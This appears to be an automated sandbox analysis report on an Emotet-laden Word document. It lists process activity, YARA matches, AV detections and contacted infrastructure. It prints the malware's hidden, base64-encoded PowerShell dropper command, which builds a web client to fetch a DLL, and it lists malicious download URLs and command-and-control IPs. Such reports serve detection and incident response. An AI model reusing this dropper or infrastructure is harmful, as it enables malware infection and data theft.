IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	7_2_10016021
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	7_2_10018026
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	7_2_10018090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	7_2_100178A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_100150C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	7_2_10016A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,	7_2_10017A6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_1000DADD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_1000DB1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10017B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	7_2_1000A33F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	7_2_10017B5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	7_2_10017BD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	7_2_10016429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	7_2_10017C5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	7_2_1000DD4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	7_2_10017E4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_10017F79

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10010D9C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_10010D9C

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 0000000F.00000002.2153905031.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155916188.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150770541.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147679834.0000000000311000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162568948.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141920127.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2159102288.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2358984806.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155772363.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157336614.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143541090.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147601789.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150877098.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141994054.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162462473.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2149091905.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146032293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146169134.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2153961508.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152298877.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2158760347.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
167.71.148.58	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
35.200.206.198	unknown	United States	15169	GOOGLEUS	true
202.187.222.40	unknown	Malaysia	9930	TTNET-MYTIMEdotComBerhadMY	true
107.180.12.39	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
184.66.18.83	unknown	Canada	6327	SHAWCA	true

Contacted Domains

Name	IP	Active
localaffordableroofer.com	107.180.12.39	true
zenithcampus.com	35.200.206.198	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://167.71.148.58:443/um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/	true	Avira URL Cloud: safe	unknown
http://zenithcampus.com/l/yQ/	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: https://johnhaydenwrites.com/track_url/P/	Avira URL Cloud: Label: malware
Source: https://nahlasolimandesigns.com/nahla3/d/	Avira URL Cloud: Label: malware
Source: https://vietnhabienhoa.com/wordpress/QUTy/P	Avira URL Cloud: Label: malware
Source: http://hbprivileged.com/cgi-bin/kcggF/	Avira URL Cloud: Label: malware
Source: http://zenithcampus.com/l/yQ/	Avira URL Cloud: Label: malware
Source: https://football-eg.com/web_map/n/	Avira URL Cloud: Label: malware
Source: https://vietnhabienhoa.com/wordpress/QUTy/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	Metadefender: Detection: 56%			Perma Link
Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: DAT.doc	Virustotal: Detection: 71%			Perma Link
Source: DAT.doc	ReversingLabs: Detection: 82%

Machine Learning detection for dropped file

Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll

Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_0020A69B CryptDecodeObjectEx,

20_2_0020A69B

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: <ystem.pdbF source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
